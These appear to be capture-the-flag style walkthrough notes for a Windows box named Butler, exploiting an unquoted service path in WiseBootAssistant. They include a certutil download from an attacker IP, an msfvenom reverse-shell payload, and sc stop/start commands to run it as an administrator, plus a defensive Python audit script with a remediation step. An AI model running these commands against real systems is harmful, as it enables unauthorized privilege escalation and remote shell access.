Butler

The Windows equivalent of ls is dir.

Moving a file onto the Windows host (download over HTTP with certutil):

certutil.exe -urlcache -f http://192.168.218.128/Wise.exe Wise.exe

Finding the privesc vector with winPEAS:

WiseBootAssistant(WiseCleaner.com - Wise Boot Assistant)[C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe] - Auto - Running - No quotes and Space detected
YOU CAN MODIFY THIS SERVICE: AllAccess
File Permissions: Administrators [AllAccess]
Possible DLL Hijacking in binary folder: C:\Program Files (x86)\Wise\Wise Care 365 (Administrators [AllAccess])
In order to optimize system performance,Wise Care 365 will calculate your system startup time.

What "No quotes and Space detected" means:

The service's ImagePath is unquoted and contains spaces, so Windows walks the path left to right and tries each prefix that ends at a space as an executable (C:\Program.exe first, then C:\Program Files (x86)\Wise\Wise.exe, and so on) until one exists. We can put a Wise.exe inside \Wise\ as the payload, since that candidate is tried before the real BootTime.exe.
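The prefix-splitting just described, worked through as an added audit example in Python (not part of the original notes and not a winPEAS component): search_candidates lists, in order, the executables Windows would try for a service ImagePath, audit_services flags services where a higher-priority candidate lands in a directory standard users can write to, and quote_image_path gives the remediated (quoted) path. The service list and the writable-directory set are constructed sample data; only the WiseBootAssistant path comes from the winPEAS output above, and treating the \Wise\ folder as user-writable is an assumption for the example. The logic is string-based, so it runs off-Windows too.

```python
"""Audit unquoted service ImagePaths (CWE-428). Added example, not from the notes."""
from typing import Dict, List, Set

# ImagePath reported by winPEAS on the page; the other two entries are constructed.
PAGE_PATH = r"C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe"
SAMPLE_SERVICES: Dict[str, str] = {
    "WiseBootAssistant": PAGE_PATH,
    "Spooler": r"C:\Windows\System32\spoolsv.exe",               # no spaces: safe
    "VendorSvc": r'"C:\Program Files\Vendor App\svc.exe" -run',  # quoted: safe
}
# Assumption for the example: directories a standard user can write to.
USER_WRITABLE_DIRS: Set[str] = {r"C:\Program Files (x86)\Wise"}


def search_candidates(image_path: str) -> List[str]:
    r"""Executables CreateProcess tries, in order, for a service ImagePath.

    A quoted path yields only the quoted program. An unquoted path with
    spaces yields every prefix ending at a space (with .exe appended),
    then the full path: C:\Program.exe, C:\Program Files.exe, ...
    """
    if image_path.startswith('"'):
        return [image_path.split('"')[1]]
    parts = image_path.split(" ")
    candidates: List[str] = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        candidates.append(prefix if prefix.lower().endswith(".exe") else prefix + ".exe")
    candidates.append(image_path)
    return candidates


def parent_dir(path: str) -> str:
    """Directory part of a Windows path (string-based, works off-Windows)."""
    return path.rsplit("\\", 1)[0]


def audit_services(services: Dict[str, str], writable_dirs: Set[str]) -> Dict[str, List[str]]:
    """Return {service: [candidate paths]} for services whose unquoted ImagePath
    has a candidate, tried before the real binary, inside a writable directory."""
    findings: Dict[str, List[str]] = {}
    for name, image_path in services.items():
        cands = search_candidates(image_path)
        if len(cands) == 1:
            continue  # quoted, or no spaces: nothing to flag
        risky = [c for c in cands[:-1] if parent_dir(c) in writable_dirs]
        if risky:
            findings[name] = risky
    return findings


def quote_image_path(image_path: str) -> str:
    """Remediation: the quoted form to set with `sc config <svc> binPath=`."""
    return f'"{image_path}"'


if __name__ == "__main__":
    for svc, paths in audit_services(SAMPLE_SERVICES, USER_WRITABLE_DIRS).items():
        print(f"{svc}: candidates in writable dirs: {paths}")
        print(f"  fix: {quote_image_path(SAMPLE_SERVICES[svc])}")
```

Running it prints the WiseBootAssistant finding with both plantable candidates in the \Wise\ folder, plus the quoted ImagePath that removes the ambiguity; tightening the folder ACL so standard users cannot write there closes the same gap from the other side.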

Creating the msfvenom payload:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.218.128 LPORT=7777 -f exe > Wise.exe

How to get it to run as root/admin? Restart the service so it picks up the planted binary.

Stop the WiseBootAssistant service:

sc stop WiseBootAssistant

Then start it again:

sc start WiseBootAssistant